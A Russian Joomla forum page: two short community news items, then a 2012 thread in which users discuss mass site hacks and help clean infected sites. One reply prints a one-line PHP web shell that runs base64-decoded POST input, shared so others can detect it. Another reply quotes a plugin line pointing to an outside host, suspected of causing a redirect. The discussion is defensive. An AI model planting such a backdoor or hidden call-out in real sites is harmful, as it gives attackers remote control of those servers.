Новости Joomla

👩‍💻 SW JProjects v.2.6.1 - компонент каталога расширений для веб-приложений.

👩‍💻 SW JProjects v.2.6.1 - компонент каталога расширений для веб-приложений.

Компонент позволяет сделать свой мини-Joomla Extensions Directory - каталог расширений для CMS (не только для Joomla) или файлов. Есть возможность скачивания по лицензионным ключам создания кастомных схем данных для сервера обновлений.

👩‍💻 v.2.6.1. Что нового?
- Правки наследования схем серверов обновлений. Улучшена логика наследования схем серверов обновлений для проектов компонент - категория - проект.
- Не стабильные релизы в сервере обновлений. Теперь в данные сервера обновлений попадают все версии (alpha, beta и т.д.), а не только stable.
- Косметические изменения. В шаблоне по умолчанию сделаны замены некоторых CSS-классов, уточнено присвоение атрибутов loading=lazy и fetchpriority.
- Рефакторинг и правки кода. Текущее обновление кодовой базы.
- Исправление ошибок.

👩‍💻 Больше спасибо за помощь в тестировании участникам нашего сообщества Александру Новикову (@pro_portal) и Александру Судьбинову (@alexrevo).

- Страница расширения
- GitHub расширения
- Joomla Extensions Directory

@joomlafeed

Событие Pizza, Bugs & Fun - 29-30 января 2026 года.

Событие Pizza, Bugs & Fun  - 29-30  января 2026 года.

Уже несколько лет в мире Joomla проводятся мероприятия "Pizza, Bugs & Fun" (#PBF), где каждый может посвятить несколько часов своего мозгового времени тому, чтобы наша любимая CMS стала ближе к идеалу.

Ссылки на видео и статьи из этого поста рассказывает об организационных вопросах, которые пригодятся для участия в PBF, а так же что и как делать.

В рамках события PBF все желающие могут собираться в общий онлайн чат, обсудить вопросы Joomla и приложить к их разрешению свою руку. Самый классный вариант, когда эта встреча происходит оффлайн: тогда организовывается пицца, напитки по вкусу и несколько часов совместного творчества.

Каждый помогает тем, что он умеет:

  • кто-то пишет недостающую документацию,
  • кто-то пишет код,
  • кто-то тестирует как исправлены ошибки или сделан новый функционал.

На сайте события есть карта, можно "захостить" свою локацию. Практически все движки в мире развиваются за счёт спонсирующих их компаний. Joomla одна из немногих, где развитие идёт только усилиями международного сообщества энтузиастов.

https://www.youtube.com/watch?v=a-FuVKXg_Uw 

На момент написания данного поста в репозитории Joomla 810 открытых Issue (как правило это баги) и 236 Pull request (PR, исправление багов и новый функционал). Все PR обязательно тестируются минимум двумя участниками сообщества, дабы в конечный код движка не проскочила ошибка.

Если каждый из участников только нашего сообщества сделает даже одно тестирование, то, боюсь, PR и Issue на всех не хватит 😀 И ничего не останется нашим коллегам из международных Joomla-чатов.

0 Пользователей и 1 Гость просматривают эту тему.
  • 53 Ответов
  • 16697 Просмотров
*

otto

  • Новичок
  • 6
  • 0 / 0
Re: Массовые взломы
« Ответ #30 : 21.01.2012, 12:44:07 »
Информация для размышления.
не так давно у меня взломали 3 сайта - в шаблон встроили около 20 ссылок на всякие смс-сервисы.. ладно думаю - сам виноват (пароль ftp хранил в клиенте, ну и так по поводу безопасности не слишком маньячил) через какое-то время заметил в панели явм рост входящих ссылок (по 50-100 за ап) все бы хорошо, но анкоры у ссылок все теже смс-сервисы (как выяснилось кроме ссылок в шаблон у меня в директории logs разместили минисайт - ссылки были на него) - налицо взлом ftp и при чем здесь Joomla... странность в том, что все взломанные сайты, с которых ведут ссылки (уже более 150) ВСЕ НА Joomla!
ps. версия жумлы на момент взлома (не утверждаю что взлом был именно Joomla) 1524, хостинг таймвеб, дополнения по минимуму и все с офсайтов (обновляются не регулярно, но обновляются)
*

Лат

  • Захожу иногда
  • 85
  • 19 / 6
  • Звоните 8 (905) 778-52-44
Re: Массовые взломы
« Ответ #31 : 21.01.2012, 13:48:06 »
См. подпись: "Домен за 99 рублей и надежный хостинг"  - может по этому?

проверьте права папок (644 должны быть) - я так делал но не помню на какие папки :(

Смотрю подпись. Домены от Reg.ru. Хостинг- свой сервер от fastvps за 3000р в месяц, у обратившихся клиентов— timeweb.ru, на нем кстати мои аккаунты пока нормально работают. Вы это вообще к чему сказали? Потроллить типа?

Права папок— все в порядке, я их не менял, я Joomla 7 лет занимаюсь и помню об этом.
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #32 : 21.01.2012, 14:07:22 »
пароль ftp хранил в клиенте, ну и так по поводу безопасности не слишком маньячил
я щас удалил все пароли в мозиле, файлзилле, короче все записал (они были конечно) но все равно ВСЕ нафиг поудалял!
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #33 : 21.01.2012, 14:35:26 »
Да походу хостинги вскрывают на wordpress такая же каша просто сайтов на нем поменьше вот и шумиха меньше.(дрючат по всему мира причем один и тотже код закидывают) у меня часто ищут директорию usr вот лог
Спойлер
[свернуть]
Вот новую хня появилась а вчера уже и сюда с такой же бедой обратились
я себе в php.ini
Спойлер
[свернуть]
добавил
Спойлер
[свернуть]
плюс в haccess
Спойлер
[свернуть]

сейчас что то корректирую из htaccess от Nicholas K. Dionysopoulos
потихоньку добавляю себе
Спойлер
[свернуть]
вот как то так


p.s. обновленный .htaccess от Nicholas K. Dionysopoulos 
« Последнее редактирование: 30.01.2012, 19:38:08 от oriol »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #34 : 21.01.2012, 14:46:19 »
я щас удалил все пароли в мозиле, файлзилле, короче все записал (они были конечно) но все равно ВСЕ нафиг поудалял!
Да бред все это есть перехватчики клавы уж усли в комп проникли то это пи............. так что можешь обратно сохранить
на почитай
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #35 : 21.01.2012, 14:52:47 »
Да бред все это есть перехватчики клавы уж усли в комп проникли то это пи............. так что можешь обратно сохранить
на почитай
спасибо! обязательно прочту...хотя уже щас вижу что нифига не пойму :(
Просто я сохранял пароли тк они имели след вид 6567fgghj43234rtyyu тоб НИКТО ваще не взломал :) знаю что если захотеть то обязательно взломают...терь упростил, но не сохраняю

Также считаю что оч важна версия Windos - тк  на XP были такие вирусы что ваще капец :o а на 7 тьфу тьфу тьфу вроде нет ^-^

ну а если тайплоггеры что ле? я вот думаю эл клаву использовать еще
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #36 : 21.01.2012, 15:03:05 »
я вот думаю эл клаву использовать еще
А ты Винокуру не родственник ? )))))
Там пишут что перехватывают в сети (между пунктом А и Б)
*

ritm-it45

  • Захожу иногда
  • 63
  • 0 / 0
Re: Массовые взломы
« Ответ #37 : 21.01.2012, 18:08:57 »
у себя нашел такого троянчика: "PHP.Shell-AX[Trj]" (Avast)

у меня лежал здесь:
./components/com_ag_google_analytics2/index.php
./modules/mod_myblog_archive/
./includes/class.php

сохранил себе, надо будет разобрать
« Последнее редактирование: 21.01.2012, 18:13:48 от ritm-it45 »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Re: Массовые взломы
« Ответ #38 : 21.01.2012, 20:19:23 »
Ребят, ну когда же вы перейдете на *nix? Вирусы? Трояны? не, не слышал...
А из своего админского опыта скажу, что лучше правильно настроенной Авиры ничего нет (Internet Security).
А если брать бесплатные решения то Avira Personal и Outpost (есть бесплатный фаервол.
otto, сам виноват - пренебрежение элементарными правилами безопасности, а ломали только Joomla возможно для того, чтобы завести в заблуждение, чтобы решили, что ломали именно движки. И обновляться надо во время...
А еще можно на виртуалке работать... Поработал - снес, забыл. Пароли сохранил в голове.
Цитировать
у меня лежал здесь:
./components/com_ag_google_analytics2/index.php
А Вам нужен этот компонент? Трудно зайти на Google Analitycs и посмотреть статистику? Чем меньше расширений тем лучше. Сама по себе Joomla 1.5.25 очень хорошо защищена, конечно не без дыр, я думаю, но их не так как в старых версиях или в 1.7.
Просто мне кажется, что многие зря задают такие вопросы "меня взломали, что может быть? Я не знаю что делать"
А все элементарно:
Последняя версия Joomla. (лично я пока склоняюсь к 1.5.25) Изменение префикса базы данных с jos на любой другой. Чем меньше расширений - тем лучше. Посему, что можем - допиливаем руками. Зачем ставить целый модуль для кнопки "наверх" если это можно сделать парой строчек кода? Не знаете как? Пишите - Вам здесь помогут. У меня мощный портал есть, на котором всего 3 компонента включено - это Поиск, Контакты и Ссылки, а зачем больше то? Ну да пилил руками... Походу дела учился, но результат того стоит! Выбирайте надежный проверенный хостинг. Не ведитесь на "хостинг для Joomla за 99 рублей". Какой может быть хостинг для Joomla скажите мне? Она может работать и на апаче и на nginx и т.п. И тут влияет скорее скорость работы и возможности, но хостинга или VPS\VDS, а не Joomla. Откажитесь от вареза(!) лучше за работу получить на 1000руб меньше, чем потом ночи сидеть и все переделывать, или платить деньги за лечение. Перед тем как поставить расширение подумайте - а надо ли оно вам? Проверьте его на уязвимости, просто пролистав списки уязвимостей расширений на оф сайте уязвимостей Joomla. Если оно Вам больше не нужно не оставляйте его, можно конечно и выключить, но лучше удалить и проверить все ли файлы удалились.
И наконец следите за свой виндой. Ну или переходите на *nix или MAC если Вы дизайнер.
*

SmokerMan

  • Гуру
  • 5290
  • 720 / 26
Re: Массовые взломы
« Ответ #39 : 21.01.2012, 23:05:18 »
Langoliers
Прочиатал половину, дальше букав не осилил в целом политика ясна - Вы все ***ы, которые сами мне даете ключи, а потом плачитесь что у вас забрали печенько.
Будьте бдительны)))
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Re: Массовые взломы
« Ответ #40 : 21.01.2012, 23:41:35 »
SmokerMan, в точку!
действительно, что то я распиразболтался не на шутку :)
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #41 : 21.01.2012, 23:49:45 »
И наконец следите за свой виндой
ВОТ С ЭТИМ НА ВСЕ 100 согласен!
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
Re: Массовые взломы
« Ответ #42 : 23.01.2012, 01:13:29 »
не взломан не один из 12 сайтов созданных мной, все висят на мультихосте(не реклама)
даже тех кто висит в топ1-3(рекламные места яндекса) не ломанули, дело не в Joomla а в вирусах в компе я так понимаю, у меня стоит аваст
ну и в раздаче этих кодов кому попало

узнал сегодня от знакомого что его ломанули сайт висит на best-hoster.ru   я зашел нашел 3000 вирусов  пичалька

вот думаю лечить и переводить к себе под крыло или не стоит?
вычитал что заражение идет через файл post.php  зарытый в фтп(чаще в папке images)


если у кого то он есть, выложите плз его код что бы искать другие файлы, ведь не все же на автомате засовывали пост, некоторые хакеры наверно переименовывали
« Последнее редактирование: 23.01.2012, 01:27:23 от hedeag »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #43 : 23.01.2012, 10:06:17 »
если у кого то он есть, выложите плз его код ..........
Код
<?php eval(base64_decode($_POST["php"])); ?>
http://joomlaforum.ru/index.php/topic,197284.msg1041800.html#msg1041800
*

!eX

  • Новичок
  • 7
  • 0 / 0
Re: Массовые взломы
« Ответ #44 : 28.01.2012, 22:18:54 »
Подскажите, есть методы автоматического удаления такого кода, например скриптом, если есть подскажите.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #45 : 28.01.2012, 22:23:33 »
Подскажите, есть методы автоматического удаления такого кода, например скриптом, если есть подскажите.
http://joomlaforum.ru/index.php/topic,197284.msg1043065.html#msg1043065
*

!eX

  • Новичок
  • 7
  • 0 / 0
Re: Массовые взломы
« Ответ #46 : 28.01.2012, 22:39:33 »
Благодарю за ссылку.
*

cult4

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Массовые взломы
« Ответ #47 : 09.02.2012, 01:01:49 »
А я то думаю, что случилось. У меня хостинг на регру, поломали не только Joomla 1.5.25, но и одну из платных cms. Только сегодня долечил. Сидел как дурак вручную вычищал. Если бы не форум - еще бы 2 дня сидел.
*

MaxFarSeer

  • Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
Re: Массовые взломы
« Ответ #48 : 09.02.2012, 09:22:51 »
у знакомого тоже помимо жумлы еще modx попал под раздачу, правда только 1 файл
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

WOOF

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Массовые взломы
« Ответ #49 : 29.03.2012, 22:22:16 »
Народ, помогайте.
Только на одной странице сайта http://kompanec.ru/index.php?option=com_formcalc&view=formcalc&formid=1&Itemid=24 появилась надпись:
Found
The document has moved here.
Apache/2.2.16 (Debian) Server at delashop.ru Port 80"

Пробовал искать Notepad++ по всему сайту на предмет eval и base64 - ничего. глушняк. По измененным файлам тоже ничего. В шаблоне все чисто, index.php в корне тоже нормален. В images никаких php. FTP отключил напрочь - есть прямой достп к серверу. Может кто подскажет, куда копать?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #50 : 29.03.2012, 23:34:49 »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #51 : 30.03.2012, 21:02:47 »
попробовал просто поискать по "MD5" - ничего похожего не нашел. Статью просмотрел, но ведь MD5 встречается и в мирных целях- пароли пользователей. И потом, когда удалил полностью компонент и плагин, которые выводят конкретно эту страницу и даже руками вычистил папки, осталась только эта надпись, то есть генерируется она откуда-то еще. НО! Больше нигде этой надписи нет. :(

plg_formcalc_1.5\formcalc.php   строка 119

Функция
ob_start(); 

дальше   строка    143
$host = "delashop.ru/host.php?"; 

короче копай там

Вот мне не понятно если качал с оф сайта то нах им это надо ?
Или не с оф сайта ?
*

WOOF

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Массовые взломы
« Ответ #52 : 30.03.2012, 21:19:15 »
plg_formcalc_1.5\formcalc.php   строка 119

Функция
ob_start();  

дальше   строка    143
$host = "delashop.ru/host.php?";

короче копай там

Вот мне не понятно если качал с оф сайта то нах им это надо ?
Или не с оф сайта ?


Качал с официального: http://delajoom.ru/index.php/o-komponente-formcalc
Кстати, у них на какой-то странице эта фигня тоже есть. Написал их админу в аську - молчит

Закомментировал весь этот блок - не помогло.
« Последнее редактирование: 30.03.2012, 21:25:56 от WOOF »
*

WOOF

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Массовые взломы
« Ответ #53 : 05.04.2012, 12:25:36 »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Частые взломы сайта

Автор VIPERR37

Ответов: 3
Просмотров: 1044
Последний ответ 25.02.2017, 00:52:38
от stopvirusby
Безопасность Joomla (Взломы - причины и следствия)

Автор Craze

Ответов: 23
Просмотров: 4020
Последний ответ 17.09.2015, 09:23:20
от wishlight
Предновогодние взломы

Автор wishlight

Ответов: 8
Просмотров: 2028
Последний ответ 22.01.2013, 15:41:56
от flyingspook
wso, america, шелл, очистка логов, отвественность за взломы..

Автор danik.html

Ответов: 5
Просмотров: 2922
Последний ответ 02.06.2012, 23:20:31
от flyingspook